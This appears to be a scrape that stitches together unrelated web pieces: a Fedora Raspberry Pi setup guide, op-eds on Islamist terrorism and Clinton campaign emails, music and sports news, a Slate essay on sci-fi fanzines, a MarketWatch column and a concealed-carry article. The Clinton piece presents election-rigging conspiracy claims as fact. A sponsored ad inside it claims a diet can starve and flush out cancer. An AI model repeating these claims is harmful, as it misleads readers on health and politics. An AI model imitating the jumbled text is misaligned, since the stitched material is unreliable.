What will never be supported
Basically this is purely the old ARMv6 Raspberry Pis. This currently includes the Zero, Model A, older “v1” Raspberry Pi model B, and the current generation “compute module.” For these, use Pignus (note I've not tested it).
We'll support the announced newer compute 3 modules when it's available. Similarly any new future device support will be reviewed as information becomes available.
Getting started
So enough of me dribbling on here you say? Just GET IT WORKING NOW!! Well here you go….
There detailed options for setting up a SD card for Linux, Windows and macOS detailed on the Fedora Raspberry Pi wiki page. Details of the latest images are there too but you can get Fedora 25 Beta images for Workstation, Server and various Spins and Minimal image directly.
To write the image to the card you can use a terminal with the following command. Remember to use the correct /dev/XXX for your card and to update the image name!
xzcat Fedora-IMAGE-NAME.raw.xz | sudo dd status=progress bs=4M of=/dev/XXX
There are other options documented in the wiki. You'll also have to resize the root filesystem (we shrink it to minimise the download). The easiest way to do this is with gparted before you plug it into your Raspberry Pi.
On the first boot you'll get presented with the standard initial setup to create a user. Similar to the LiveCDs on x86 we don't have default users and passwords due to security.
Getting help
So where can you get help if it's not working? The usual Fedora support forums are:
French police in Longpont, northern France, take part in the hunt for the two gunmen suspected of attacking the Paris offices of French satirical weekly Charlie Hebdo, killing 12 people (AFP)
OK, I get it. As liberals, we're supposed to look beyond the rhetoric of the Islamists who massacred journalists in Paris, so that we don't condemn an entire religion for their acts.
After they had slaughtered the Charlie Hebdo cartoonists and others, the Kouachi brothers coolly headed outside the newspaper's offices and shouted, “We have avenged the Prophet Muhammad!”
Liberal commenters implored us not to accept those words literally. What the Kouachi brothers had done was not in the name of “true” Islam, we were told. In fact, some commenters said, the killings had nothing to do with religion at all.
Charlie Hebdo had printed numerous cartoons of Muhammad, whose image, many Muslims believe, is not to be printed at all, let alone to be mocked. (The fact that the Koran doesn't specifically prohibit images of the prophet really doesn't mean much if the billion-plus Muslims in the world feel otherwise.)
The Kouachi brothers may have felt they were avenging their prophet by murdering the journalists who printed those cartoons, but like the rest of us, many Muslims were shocked and dismayed by their actions. Here at Raw Story we found numerous cases of moderate Muslims denouncing what had happened in Paris.
And that's extremely important. The Kouachi brothers and extremists like them don't represent all of Islam, and we're never going to solve the problems of Islamic extremism without the help of moderate Muslims.
But I have no patience for the idiot liberal commenters who tell us that religion had nothing at all to do with the bloodshed in Paris.
And this week, there's been a dishonest attempt by a few writers who are trying to convince us that Muslim terrorism is not only not the problem we perceive it to be, but that it is, in fact, practically nonexistent.
I'm talking about a column at the Daily Beast by lawyer and comedian Dean Obeidallah, a Muslim, which was titled ‘Are All Terrorists Muslims? It's Not Even Close.'
Obeidallah's piece showed up at the Daily Beast after several similar items — all citing an FBI study about terrorism in America — had made the rounds of smaller left-leaning websites.
And their point was this: Why are we panicked about Muslims when most terrorism in this country comes from LATINOS.
Say what?
I lived in some pretty rough Latino-heavy neighborhoods in Los Angeles growing up, but I don't remember gavachos being beheaded in the name of la Virgen.
Citing the FBI report, Obeidallah says that 42 percent of the terror attacks in the US since 1980 were “carried out by Latino-related groups,” while only about 6 percent were the responsibility of Muslims.
Shocking, isn't it? (Think Progress cited the same study in its own story about how Muslim terrorism is almost nonexistent, despite popular perception.)
Those numbers seemed to defy reality, so I decided to take a closer look at the FBI study.
And here's what neither Obeidallah nor Think Progress bothered to tell readers.
Yes, the FBI did put together a study which totalled all of the incidents it characterized as acts of terror on American soil between 1980 and 2005, and only a few of them were committed by Islamists. And it turns out that many of the acts were committed by “Latino” groups — for the most part, Puerto Rican nationalists.
But that study is swamped by incidents that resulted not only in no deaths, but not even any injuries.
In other words, because of attacks by Puerto Rican seperatists in the 1980s and 1990s that did some property damage, we're supposed to ignore the lethal attacks being done today by Muslim extremists?
Let's take another look at the numbers from the FBI report, and this time we'll ignore the attacks that didn't cause deaths.
Also, why stop at 2005? Isn't that giving away the game, that you're not going to count recent attacks, which would indicate whether Islamist attacks are on the rise?
Counting only lethal incidents, then, and from 1980 to 2014, here are the numbers.
— Left wing radicals, in two incidents, caused two deaths.
— Armenian nationalists, in two incidents, caused two deaths.
— Jewish extremists, in three incidents, caused three deaths.
— Unknown perpetrators caused five deaths in the anthrax attacks of 2001.
— Latino nationalists, in seven incidents, caused seven deaths.
— Right wing radicals, in 13 incidents, caused 192 deaths.
— Muslim extremists, in 11 incidents, caused 3,003 deaths.
So as much as Obeidallah and Think Progress and others are trying to convince you that the real threat is “Latinos,” these numbers would suggest that law enforcement is on to something when they spend resources trying to root out right wing domestic terrorists and Islamists bent on destruction.
Another thing those two groups have in common, besides a high body count: The intoxicating effects of religious fervor. Violence by right wing extremists in the US is steeped in Christian terrorism. And here at Raw Story, at least, when a Christian warrior kills in the name of his religion, we do think it makes sense to challenge Christian moderates to speak up and denounce such acts. We don't think Americans should get blown up by idiots waving either a Bible or a Koran.
Islamic extremism is very real, and no matter what Ben Affleck thinks, it really does have something to do with religion.
In “An Open Letter to Moderate Muslims,” the Pakistani-Canadian writer Ali A. Rizvi laid out the problem faced by Islam, which he says is in bad need of reform.
Dissenters in other faiths, he points out, aren't getting killed for offering their opinions…
This is in stark contrast to the Muslim world where, according to a worldwide 2013 Pew Research Study, a majority of people in large Muslim-majority countries like Egypt and Pakistan believe that those who leave the faith must die. They constantly obsess over who is a “real” Muslim and who is not. They are quicker to defend their faith from cartoonists and filmmakers than they are to condemn those committing atrocities in its name… Islam needs reformers, not moderates. And words like “reform” just don't go very well with words like “infallibility.” The purpose of reform is to change things, fix the system, and move it in a new direction. And to fix something, you have to acknowledge that it's broken — not that it looks broken, or is being falsely portrayed as broken by the wrong people — but that it's broken. That is your first step to reformation.
Rizvi cites Muslim moderates who are speaking out bravely today about challenging the inerrancy of the Koran. “Maajid Nawaz, a committed Muslim, speaks openly about acknowledging problems in the Quran. Recently, in a brave article right here on The Huffington Post, Imra Nazeer also asked Muslims to reconsider treating the Quran as infallible,” Rizvi wrote.
Acknowledging that Islam is broken and badly needs reform isn't going to happen as long as liberal commenters pretend that attacks like the ones in Paris have nothing to do with religion. Or by dishonestly citing studies in a way to make it look like Muslim extremism hardly exists.
Fundamentalist Islam has a problem. And we need to confront it head on.
The Hillary Clinton campaign emails released by WikiLeaks Monday are the most alarming yet – and they've revealed what supporters of Vermont Sen. Bernie Sanders long believed.
Democratic presidential candidate Hillary Clinton spent years preparing to rig the 2016 presidential election.
An email from top Democratic party lobbyist Erick Mullen to Clinton campaign Chairman John Podesta in 2015 has revealed that Clinton orchestrated a Democratic coup to install Debbie Wasserman-Schultz to the head of the Democratic National Committee – all the way back in 2011.
In order for Clinton to get Wasserman-Schultz, the co-chairwoman of her failed 2008 presidential campaign, to the head of the Democratic National Committee, she needed to get the then-chair to step down… and also recommend Wassernman-Shultz.
The DNC chair at the time? Virginia Sen. Tim Kaine, Clinton's current vice presidential nominee.
When Kaine resigned in 2011, he pushed President Barack Obama to appoint Wasserman-Shultz as his successor.
Why? Turns out, Clinton had already promised him the vice presidency as payment for his cooperation.
In the revealing 2015 email, Mullen complains of the “unseemly” way political insider Bob Glennon was bragging to Sens. Sherrod Brown and Heidi Heitcamp about Clinton's underhanded plan at a dinner.
Sponsored: Did you know you can actually starve cancer cells to death?
Yes! You can literally kill them off by the thousands — just by making an easy dietary swap.
It sounds too good (and simple) to be true, but before you write this off as garbage… at least see how one brave doctor is leading the charge with this easy diet and helping his patients FLUSH cancer completely out of their own bodies.
The best part is, you won't feel any sort of hunger at all… so don't wait another second. Start beating cancer TODAY and click here to see for yourself just how easy it can be.
Busted… but not before the move did the trick. Thoughout the highly controversial Democratic primary, Sanders supporters accused Wasserman-Schultz of rigging the process against them. The evidence was so damning, at the end she was forced to resign as DNC head.
By then, Clinton had won the Democratic presidential nomination. As thanks, Clinton quickly hired Wasserman-Shultz to her campaign – and then nominated Kaine as her vice president.
You scratch Clinton's back, she'll scratch yours.
Americans who have so proudly admitted, “I'm With Her” don't have any idea who she truly is.
Clinton has successfully fooled the American public, despite opponents saying she doesn't have a genuine bone in her body. And every single statement, stance, and even emotion was calculated by her desire for the White House… and no matter what Democratic voters wanted, she was going to make sure they had to pick her.
It doesn't end there. The recently released documents show that Clinton admitted to having separate public and private opinions on major issues.
The leak that followed Monday exposes exactly how those opinions differ, and the dishonesty is shocking.
The emails reveal that Clinton's public opinion is whatever her staff tells her is the best way to seize the White House.
Although he was chastised by the media for it, Republican nominee Donald Trump was completely right about Clinton “playing the woman card.” Her staff was discussing it's power to manipulate voters before Clinton had even publicly announced her candidacy.
In March of 2014, Robby Mook, who was later named her campaign manager, wrote that “gender will be a big field and volunteer motivator, but it won't close the deal.”
Her staffers also decided how much emotion and outrage she should show at the Benghazi hearing. Her massive mistakes, which cost the lives of four American heroes, became another political ploy that her staff worked tirelessly for years to twist to her benefit.
In deciding whether to back the reinstatement of the 1993 Glass-Steagall Act, that separated commercial and investment banking, her team discussed if it would cost them the coveted endorsement of Elizabeth Warren. So they disregarded the rule of the law, and focused solely on the potential loss of an endorsement and the effects on the Clinton campaign.
Everything neat and in put into place YEARS ago by the Clinton campaign – All these backroom deals and shady conspiracies just to seize power.
And she could be just a month from getting away with it.
Once Clinton is sitting in the Oval Office, and voters no longer possess the ability to decide her fate, there's only one thing her past can make us certain of – Clinton will do whatever it takes to STAY in power.
That's a scary thought.
— The Horn editorial team
Photo by Joshua Mellin
A few weeks back, The War on Drugs performed opposite Sun Kil Moon's Mark Kozelek at a Canadian music festival, sparking an indie rock feud for the ages. When The War on Drugs' set bled into his own, Kozelek responded by referring to the band as “beer commercial guitar shit” and introduced one of his songs as “The War On Drugs Can Suck My Fucking Dick”. Later, he released a pair of diss songs aimed at the Philadelphia rockers.
Yesterday, Kozelek returned to the stage at Austin's Fun Fun Fun Fest. This time, he found himself performing at the same time as El-P and Killer Mike, tka Run the Jewels, and the critically acclaimed hip-hop duo had no plans to back down.
During their set, El-P relayed a backstage encounter he had with Kozelek. “I introduced myself, I said, ‘Hey, I'm a fan, but we're the guys who are going to be interrupting your set today with how loud our fucking crowd is. And [Kozelek] said, ‘What's your name?', and I said ‘Run the Jewels,' and I swear to god he said, ‘Suck my dick, Run the Jewels.” In response, El-P said to Kozelek, “Suck my dick, Sun Kil Moon!”
El-P then asked the crowd to join him in a chant. “Everybody if you can just help me out, I think it's a good natured thing. If everyone can just say, ‘Suck my dick, Sun Kil Moon!' We mean that with all general respect, I actually enjoy your music!”
Watch footage of the moment below.
The fall of Palmyra took us all by surprise. But even more surprising is how a small unit of 60 elite ISIS super soldiers managed to route a garrison of 3,000 armed Syrians.
Yes, you read that correctly: sixty! At least according to Michael Weiss, who is never wrong about anything, especially when it is war-related and published in the Daily Beast:
A photo taken shortly before ISIS stormed Palmyra [A] mere 50 to 60 jihadists were currently besieging Palmyra, which now contains as many civilians but around 1,000 Syrian army personnel and between 1,500 and 2,000 pro-Assad militiamen. ... The Daily Beast could not independently verify these claims.
Don't let unverified claims get in the way of a great work of fiction! Who will write the Hollywood screenplay? The White Helmets?
Even more amazing is that, in the very same article, Weiss berates Putin for not stopping the assault. The world is truly upside down.
Why does ISIS even bother with maintaining Twitter accounts and various sketchy WordPress blogs? Michael Weiss has already volunteered to be their Tokyo Rose.
Google will build a new campus at Hyderabad, even as it is working towards including as many people as possible to use the Internet in India, its chief executive, Sundar Pichai, said in New Delhi at the Google for India event on Wednesday.
"In our attempt to provide Internet access to people, we have decided to provide Wi-Fi in 400 railway stations with RailTel. The first 100 stations will come online by 2016 end. Mumbai Central station will be online by January," Pichai said at the event.
This was also a part of the assurance which Google gave to Prime Minister Narendra Modi, when he visited the search engine giant's headquarters at Mountain View, Santa Clara County in California in September this year.
Regarding the company's expansion plans in India, he said: "We will ramp up our engineering investments at our Bangalore and Hyderabad facilities."
"We will also build a huge new campus in Hyderabad," he said, but did not disclose the amount of investment. The company now has 1500 employees in India.
"This country has given me and Google so much and I just hope we can give much more to the country," he said, adding: "A lot of what today is about is how we build products for the next billion Indian users, yet to come online."
Pichai at the Google for India event laid out Google's three-step approach to promoting the Internet in India. The first was the aim to give people in India and other developing countries better access to the full Internet through better connectivity and high-quality software. The second is to make Google products work better for Indians. Third, Google wants to make it easier for Indians to build on top of Google's global platforms like Android and Chrome to build solutions to local problems.
Google also announced a program to train two million new Android developers over the next three years, and said it will work with more than 30 universities across the country in partnership with the National Skill Development Corporation.
Written with inputs from IANS
Issues of the Science Fiction Fan from circa 1939–40. Courtesy of the Hevelin Collection/Ed. Olon F. Wiggins
Predicting the future is a tricky business, possibly even a dangerous one. Nevertheless, when we talk about the history of science fiction, we often focus on its most prescient moments, praising authors who anticipated new technologies or foresaw sweeping social changes. And why shouldn't we? The genre's stories are, as sci-fi writer Thomas Disch put it, “the dreams our stuff is made of. “
But it may be science fiction's fans who have provided the most meaningful barometer of things to come. While novelists, screenwriters, production designers, and cover artists have all struggled to depict the future, sci-fi's most ardent admirers were often already living it. That's not to say they were somehow using advanced technologies before anyone else. Instead, they were pioneering ways of being that wouldn't come into vogue until digital communication appeared on the scene. Long before the Internet began to change how we interact, science-fiction fandom was pioneering forms of communication and association that the Web would eventually popularize.
A clear demonstration of this fact comes via a digitization project currently underway at the University of Iowa. In 2012, the university acquired a massive collection of science-fiction and pulp literature documents from James L. “Rusty” Hevelin, a man who had been described as “a walking encyclopedia of the history of fandom.”* Hevelin's trove included more than 10,000 fan-produced zines dating back to the 1930s and early writing by Robert Heinlein, George R.R. Martin, and many others.
Le Voyage de L'Isabella au Centre de la Terre by Leon Creux, from 1922. This unique book has a fabric cover brimming with wild and colorful illustrations, and both color and black and white illustrations by Paul Coze throughout. Courtesy of the Hevelin Collection
Zines played an important role in the establishment of science-fiction culture. Indeed, many participants in this culture would go on to develop substantial fan bases of their own: Isaac Asimov and Frederik Pohl, for example, were both members of early fan societies. As Karen Hellekson explains in The Cambridge Companion to American Science Fiction, fanzines were typically self-published pamphlets, made from “stapled-together pieces of ordinary-sized letter paper, sometimes folded in half.” Fans would exchange these documents through the mail, often after discovering one another through the letters pages of magazines such as Amazing Stories. At first, zines primarily served as vehicles for editorials and reviews of other publications. Later, some would include fiction and other creative content, and many featured elaborate illustrations like those that adorn some of the items in the Hevelin Collection.
According to Hellekson, in those pre-photocopying days authors of zines would reproduce their work via carbon paper, mimeograph, or other similarly primitive means. Sprucing up these publications was often a laborious task, she writes: “Artwork, if included, would be hand drawn and might be colored by hand, so each copy would be unique.” (This wasn't always the case; some of the color art in the Hevelin Collection was reproduced by hectograph, but this process too introduced slight variations with subsequent impressions.) These relatively simple printing technologies meant that each copy of each issue had a character of its own.
Winter 1941 issue of Science Fiction Collector. Courtesy of the Hevelin Collection
Those same printing technologies also meant that many extant examples of the genre are physically fragile, turning them into fundamentally ephemeral artifacts. As Ian Chant notes in Library Journal, the paper on which many of the publications—especially the earliest examples—in Hevelin's collection were printed “is flaking and finely rendered illustrations are fading.” It's this that makes the University of Iowa's digitization effort so necessary. Spearheaded by Laura Hampton, of the university library, this project aims to photograph the entirety of the collection.
Some in the sci-fi community have expressed concern about the library's effort, especially when it comes to more recent materials. Though they're not included in the Hevelin Collection, the library's fan-related holdings include early instances of slash fiction—erotic stories that pair established, typically same-sex characters.* It also likely includes even earlier instances of fan fiction—a form that, as Hellekson writes, originally involved fiction about fans—with the potential to embarrass or otherwise trouble its creators. For those who never expected to see their work circulating beyond their relatively insular communities, digitization efforts can be worrisome.
Hampton stressed that the library is aware of these concerns, though it has received little pushback. The library wants to respect those creators' wishes as fully as possible. The team is digitizing the entire collection, but very few of those images will be publicly available, partly because the materials in the collection are still under copyright, but also because the library doesn't, Hampton said, “want to alienate the creators of these zines.”
Wonder Story Annual reprinted stories from other pulps in yearly anthologies. Its structure encapsulates the end of the pulp era and the move toward digest format magazines. Courtesy of the Hevelin Collection/Best Books Inc.
For now, selected images are accessible through a Tumblr site on which the library publishes images of some of Hampton's best finds. In the longer term, however, the library plans to crowdsource a transcription project, making the entire collection more immediately searchable for scholars and other dedicated researchers. The goal is to make it easier to study the collection without doing an injustice to those who produced it.
While this endeavor will preserve documents that would otherwise likely be lost to time, it still changes the way that their future readers will experience them. They'll neither have the feel of paper in their hands nor the chance to contribute images of their own. But digitization may not change them that much. In many ways the culture of early science-fiction fandom prefigures the ways that information circulates online today. Jonathan Senchyne, director of the University of Wisconsin–Madison's Center for the History of Print and Digital Culture (and a former grad school classmate of mine), made a keen observation when I spoke to him about the Hevelin Collection: Many of the cultural developments we most closely associate with the Internet actually precede its emergence. “One of the things I really admire about digitization projects like this one is that they remind us fan fiction and other elements of fan culture don't originate online,” he said.
The Internet has blurred the distinction between author and audience, creator and consumer, but it's not the Internet that made that line fuzzy in the first place. Fifty Shades of Grey famously began as Twilight fan fiction and has since spawned fan fiction of its own. Similar cultural feedback loops played out in zine culture long before. Hampton told me that she had come across zines assembled by a very young Ray Bradbury, some of which contained early versions of his stories. Bradbury would, of course, become a major touchstone of the genre in the years to come.
Fandom may have contributed to other forms of contemporary cultural production as well. Though they were, of course, far more sluggish, zines facilitated approaches to collective communication similar to those that would emerge on message boards and in comment threads. “There are lots of acronyms and deliberate misspellings,” Hampton said, describing the ways fans interacted with one another on the pages of their publications. Their ways of addressing one another look a great deal like the ways we write on Twitter and other outlets today.
In this light, the Hevelin Collection may ultimately offer us more than a means of studying the history of science fiction. It's possible that it will also afford a better understanding of the ways we live online. As it does so, it may contest what Senchyne calls digital exceptionalism—the idea that the Internet marks a radical break with everything that precedes it. There is, he pointed out, a very real continuity between print and digital culture. That continuity can be hard to see, however, until we study the past through the lenses that digital culture furnishes. Accordingly, Senchyne proposes, it may be the Internet that best equips us to understand the limitations of the Internet's influence.
This article is part of Future Tense, a collaboration among Arizona State University, New America, and Slate. Future Tense explores the ways emerging technologies affect society, policy, and culture. To read more, visit the Future Tense blog and the Future Tense home page. You can also follow us on Twitter.
*Correction, Sept. 23, 2015: This article originally misstated that James “Rusty” Hevelin had donated his collection to the University of Iowa. The university purchased the collection from Hevelin. (Return.) It alslo misstated that the Hevelin collection includes slash fiction. While the library's holdings do encompass slash fiction, these materials are not included in the Hevelin collection. (Return.)
Reuters New U.S. citizens wave U.S. flags at a naturalization ceremony in Los Angeles April 9.
SAN LUIS OBISPO, Calif. (MarketWatch) — The American Dream? Now a Global Nightmare? A ticking time bomb, a lethal virus spreading worldwide, could destroy the entire world, backfire, take down America and capitalism? Yes.
But, first, a little history: Five years ago Bill Gates and his Billionaires Club asked that question. But gave up. Here's why.
Gates' billionaires essentially asked: What do you think is the single, the biggest ticking time bomb that will eventually take down global economies? The absolutely the biggest one with a trigger mechanism that can ignite, set off a nuclear chain reaction that will throw a permanent wrench in global economic growth, ending capitalism, potentially destroying modern civilization as we know it.
Yes, that one. The one that — if not solved soon — renders all efforts to solve all other problems in the world irrelevant, futile and virtually impossible ever to solve. Yes, that one. What is the “big one?” Several alternative predictions have also been reported:
Global wars? Pentagon warns warfare will define human life by 2020.
Pentagon warns warfare will define human life by 2020. Big Oil? Bill McKibben's “End of Nature” prediction could ignite soon.
Bill McKibben's “End of Nature” prediction could ignite soon. Capitalism? Many progressives see capitalism destroying democracy.
Many progressives see capitalism destroying democracy. Inequality? Pope says inequality is the root of all social problems.
Pope says inequality is the root of all social problems. Climate warming? 2,000 UN scientists warn humans are killing Earth.
2,000 UN scientists warn humans are killing Earth. Technology? Robert Gordon says we can't stop GDP falling to 1%.
Biggest risk? Guess again: Not warfare ... not the inequality... not energy resource depletion ... not global warming ... not out-of-control capitalists ... yes, all are important, all part of the domino effect, the chain reaction as the global clock winds down to zero.
Yes, five years ago the one-percenters thought they knew. Bill Gates and his Billionaires Club were certain, unanimous. Gates had brought together billionaire philanthropists in a supersecret meeting in Manhattan about the time the market last bottomed. Included: Buffett, Rockefeller, Soros, Bloomberg, Turner, Oprah and others. The London Times Online reported that during the afternoon session each spoke about their favorite charities.
Then, the big question: What was the underlying, core problem driving all their interests? The world's biggest time-bomb?
Overpopulation said the billionaires. Too many people on Planet Earth.
True, the United Nations predicts that by 2050 global population will explode by as much as 40%, from more than 7 billion today to 10 billion. Overcrowding. Demanding. But as Scientific American repeatedly warns in special issues, population is “the most overlooked and essential strategy for achieving long-term balance with the environment.” The “third-rail” for politicians, ignored by the world's political leaders.
Three delusions: the American Dream mutates into Global Nightmare
But there's an even bigger problem that will peak and backfire as the American Dream goes viral. For a couple generations, spread by the economics of globalization, the American Dream has been exported, spreading the capitalism virus worldwide, accelerating global GDP growth, infecting every nation and individual with their own mind-set imbedded in the promise of the “perpetual prosperity” inherent in the American Dream.
The effect? Today capitalism, globalization, the new Global Dream, the virus is rapidly spreading, mesmerizing the brains of everyone ... mass-producing new billionaires ... global lists on Forbes, Bloomberg and CNBC report an explosion from 322 billionaires in 2000 to 1,847 in 2014... China now has 358 billionaires ... Africa has 29, adding nine last year ... today, 85 of the world's richest billionaires make more that the 3.5 billion in the bottom half ... Credit Suisse predicts 11 trillionaire families in the world by 2100.
But three self-destructive delusions dominate today's billionaires:
1. Delusion 1: Perpetual economic growth on planet of limited resources
The Super Rich are trapped a classic delusion now ingrained in the collective unconscious of the world. They have ingested a self-destructive gene. They believe the same capitalism ideology that made them superrich will continue indefinitely, that economic growth is perpetual, even on a planet of clearly limited resources. This delusion is rampant in Exxon Mobil and the energy industries as they race ahead with an unsustainable business model that's rapidly depleting nonreplaceable natural resources.
2. Delusion 2: New technologies will replace disappearing resources
The club of billionaires believes technology will overcome the limitations of resources and thus fuel the perpetual economic growth essential to create more and more billionaires, that some of this eternal prosperity will also trickle down to the world's poorest 3.5 billion people. Economist Robert Gordon refutes that assumption in his rhetorical National Business Research Institute piece “Is U.S. Economic Growth Over?” Silicon Valley technology will never overcome all the headwinds reflected by today's raging self-destructive political, economic and religious conflicts.
3. Delusion 3: Mutant Capitalists do not need to share the future
The new billionaires in America and worldwide have forgotten that the same capitalism that fueled the American Dream since 1776, that created the democracy supporting their accumulated billions, was a legacy that, in the past, also meant hope for the masses of Americans and all nations, that everyone, no matter how poor, had equal opportunities.
Unfortunately, as Jack Bogle warns, while spreading the American Dream we're also a spreading a new Mutant Capitalism, a virus infecting superrich billionaires: Further widening the inequality gap, stifling opportunities for most Americans and people worldwide, hoarding the power, wealth and opportunities for those already in the top one percent, already listed among global billionaires.
Billions are in denial of their self-destructive delusions: “One of the disturbing facts of history is that so many civilizations collapse,” warns Jared Diamond, an evolutionary biologist, Pulitzer Prize winner and author of “Collapse: How Societies Choose to Fail or Succeed.” Many “civilizations share a sharp curve of decline. Indeed, a society's demise may begin only a decade or two after it reaches its peak population, wealth and power.”
Harvard financial historian Niall Ferguson, author of “Colossus: The Rise and Fall of the American Empire,” was more dramatic, hard-hitting, immediate: The world will be caught by surprise, unprepared. The coming collapse will “accelerate suddenly, like a sports car ... like a thief in the night.” Crashing. Shocking us wide awake.
Paradox of Prosperity: the Global Dream will also peak, collapse
Today we're all being misled by these three delusions. As Diamond warns: “There are ‘optimists' who argue that the world could support double its human population.” But he adds, they “consider only the increase in human numbers and not average increase in per-capita impact. But I have not heard anyone who seriously argues that the world could support 12 times it's current impact.” But that's exactly what happens with “all Third World inhabitants adopting First World standards.”
Every nation in the world has its own version of the American Dream, the new Global Dream. Everyone wants prosperity, success, opportunity. More is never enough, either individually or nationally. Not just 310 million Americans, but 7.3 billion people worldwide are demanding more, more ... on a finite planet with dwindling natural resources, as economist Michael Klare warns in his book “The Race for What's Left: The Global Scramble for World's Last Resources.”
Bottom line: As the world population explodes 40% in the next generation, “what really counts,” says Diamond, “is not the number of people alone, but their impact on the environment, the per-capita impact.” First World citizens “consume 32 times more resources such as fossil fuels, and put out 32 times more waste, than do the inhabitants of the Third World.” \
And it's delusional to think this trend will disappear. It will get worse because billionaires are in massive denial about their delusions ... the self-destructive Global Dream will continue ... until a catastrophic black swan shocks us awake.
Get a daily roundup of the top reads in personal finance delivered to your inbox. Subscribe to MarketWatch's free Personal Finance Daily newsletter. Sign up here.
HOOVER, Alabama---The first game of Day 3 of the 2014 SEC Baseball tournament is set to begin at 9:30 a.m. when No. 2 Ole Miss (40-17) takes on Vanderbilt (41-17) at the Hoover Met.
For live updates from Nick Birdsong hit refresh on this page throughout the contest.
If you're using the AL.com smartphone app, click here for updates.
Final: Ole Miss 7, Vanderbilt 2
Ninth Inning: Ole Miss 7, Vanderbilt 2
*Vanderbilt goes down quietly to end the game.
*Will Allen's sac fly scores Auston Bousfield.
Eighth Inning: Ole Miss 6, Vanderbilt 2
*Vanderbilt's Austin Anderson singles but it's all the production the Commodores can come up with in the eighth.
*Ole Miss leaves three runners on in the top of the inning.
*Vanderbilt brings on junior right-hander Adam Ravenelle
*Vanderbilt brings on left-hander Ben Bowden.
*Ole Miss pitcher Aaron Greenwood walks in a run but comes up with a big two-out strikeout of Vanderbilt's Zander Wiel to get out of the inning.
Seventh Inning: Ole Miss 6, Vanderbilt 1
*Ole Miss explodes for four runs, highlighted by an RBI single from center fielder Auston Bousfield and a two-run base hit by third baseman Austin Anderson.
*Junior right-hander Brian Miller comes on for Vanderbilt in the seventh. Starter Tyler Beede finishes having gone six innings. He gave up two runs, one earned, on three hits and struck out four on 103 pitches.
Sixth Inning: Ole Miss 2, Vanderbilt 1
*Vanderbilt can't get anything going in the bottom of the sixth.
*Ole Miss third baseman Austin Anderson walks to start the inning and reaches third on an error on a pickoff attempt. Rebels first baseman Sikes Orvis pops out to deep center to score Anderson a break the tie.
Fifth Inning: Vanderbilt 1, Ole Miss 1
*Ole Miss third baseman Austin Anderson bobbles hard-hit ball by Vanderbilt's Bryan Reynolds but not but gathers himself to throw him at first and prevent a run from crossing the plate.
*With a runner on third and one out, Vanderbilt turns to junior lefty Aaron Greenwood. Starter Jeremy Massey goes 4 1/3 innings, allowing one run on four hits while striking out three and walking three.
*Vanderbilt starter Tyler Beede pulls himself together and strikes out Ole Miss center fielder Auston Bousfield with two outs and the Rebels leave a pair on base.
Fourth Inning: Vanderbilt 1, Ole Miss 1
*Vanderbilt gets a runner in scoring position with one but he left stranded as Ole Miss starter Jeremy Massie retires two batters on a strikeout and a pop out to get out the inning.
*Ole Miss third baseman Austin Anderson singles to start the inning but Vanderbilt gets out the inning when J.B. Woodman hits into a double play.
Third Inning: Vanderbilt 1, Ole Miss 1
*Vanderbilt's Dansby Swanson singles to start the inning but Xavier Turner hits into a double play and on the next at-bat as the Rebels take care of the Commodores.
*Preston Overbey singles up the middle for Ole Miss then steals second. Shortstop Errol Robinson singles to move him to third and left fielder Braxton Lee scores Overbey on a sac fly to left.
Second Inning: Vanderbilt 1, Ole Miss 0
*Ole Miss starter Jeremy Massie strikes out two in the bottom half of the inning.
*Ole Miss gets the bat on the ball three times but pops out twice and grounds out to end the top half of the inning.
First Inning: Vanderbilt 1, Ole Miss 0
*Vanderbilt shortstop Vince Conde strokes a two-out, RBI single up the middle to score left fielder Bryan Reynolds to get the Commodores on the board first.
*Vanderbilt starter Tyler Beede retires three-straight batters, ending it with a strikeout of Ole Miss third baseman Tyler Austin Anderson.
Pregame: Ole Miss vs. Vanderbilt
Starting lineups
Ole Miss
#11 Braxton Lee, LF, (L)
#9 Auston Bousfield, CF, (R)
#8 Austin Anderson, 3B, (L)
#30 Will Allen, C, (R)
#24 Sikes Orvis, 1B, (L)
#12 J.B. Woodman, RF, (L)
#25 Colby Bortles, DH, (R)
#1 Preston Overbey, 2B, (R)
#6 Errol Robinson, SS, (R)
Vanderbilt
#7 Dansby Swanson, 2B (R)
#9 Xavier Turner, 3B, (R)
#20 Bryan Reynolds, LF, (B)
#20 Zander Wiel, 1B, (R)
#3 Vince Conde, SS, (R)
#10 John Norwood, CF, (R)
#8 Rhett Wiseman, RF, (L)
#5 Jason Delay, C, (R)
#19 Steven Rice, DH, (L)
And the starting pitchers:
Ole Miss-LHP Jeremy Massie (2.36 ERA, 40 SO, 13 BB, 53.1 IP)
Vanderbilty0RHP Tyler Beeded (3.42 ERA, 88 SO, 36 BB, 84.1 IP)
By Sam Hoober, Alien Gear Holsters
As we're all likely aware, the House of Representatives has passed HR 38, a bill containing both a national reciprocity law but also a bit of a patch for the Brady Act, enhancing the data collection and enforcement powers of law enforcement to keep prohibited persons from purchasing firearms.
The law, if passed as-is, would compel states via the Full Faith and Credit Clause of the Constitution to recognize any valid concealed carry license. Anyone in the United States would be able to put on a concealed carry holster, put a pistol in it and be able to lawfully carry in any state so long as they had a permit.
You might get the idea that grey skies are about to clear up, and we, the maligned concealed carry community, can finally put on a happy face. The current arrangement has some serious drawbacks, as it makes criminals out of otherwise law-abiding citizens and all for the shocking act of crossing a line on a map. Harelipping Bloomberg is just the icing on the cake!
I'd hold my horses, though.
While this is a positive step in safeguarding Second Amendment rights, there are some enormous hurdles standing in the way which are going to need to be dealt with before taking effect. A lot can go wrong between here and national reciprocity.
First is the Full Faith and Credit Clause itself. For those unfamiliar, the Full Faith and Credit Clause of Article IV, Section 1 mandates that states accept (or “give full faith and credit”) to the public acts, records and proceedings of other states. In short, states must recognize and honor official documents and so on of other states, though Congress can dictate how they are recognized.
However, there are exceptions. Specifically, the Supreme Court held in Pacific Employers Insurance v. Industrial Accident that the Full Faith and Credit Clause does not apply to public policy or statutes. In other words, the laws or public policies of one state cannot override those of another, so the traffic laws of, say, California don't apply in South Dakota.
Here's why that matters: the final arbiter of what our rights actually are in practical terms is the Supreme Court, for good or ill, and there hasn't been a Supreme Court case establishing a right to carry a gun. An absolute right to own, yes; that was settled by Heller and McDonald v. Chicago, but not to carry.
The closest thing to a SCOTUS case regarding carrying of firearms outside the home were two appellate cases, 2012's Moore v. Madigan from the 7th Circuit and 2016's Peruta v. California from the 9th Circuit.
